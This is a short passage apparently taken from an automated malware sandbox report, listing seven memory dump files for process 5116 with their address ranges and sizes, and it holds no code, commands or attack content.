                                                                                                                    • memory/5116-47-0x00007FF9C2A40000-0x00007FF9C2A67000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                    • memory/5116-48-0x00007FF9C8250000-0x00007FF9C825F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      60KB

                                                                                                                    • memory/5116-58-0x00007FF9C0340000-0x00007FF9C0365000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      148KB

                                                                                                                    • memory/5116-60-0x00007FF9BE850000-0x00007FF9BE9CF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.5MB

                                                                                                                    • memory/5116-51-0x00007FF9C40B0000-0x00007FF9C40C9000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/5116-52-0x00007FF9C2740000-0x00007FF9C276B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/5116-25-0x00007FF9AF420000-0x00007FF9AFA85000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.4MB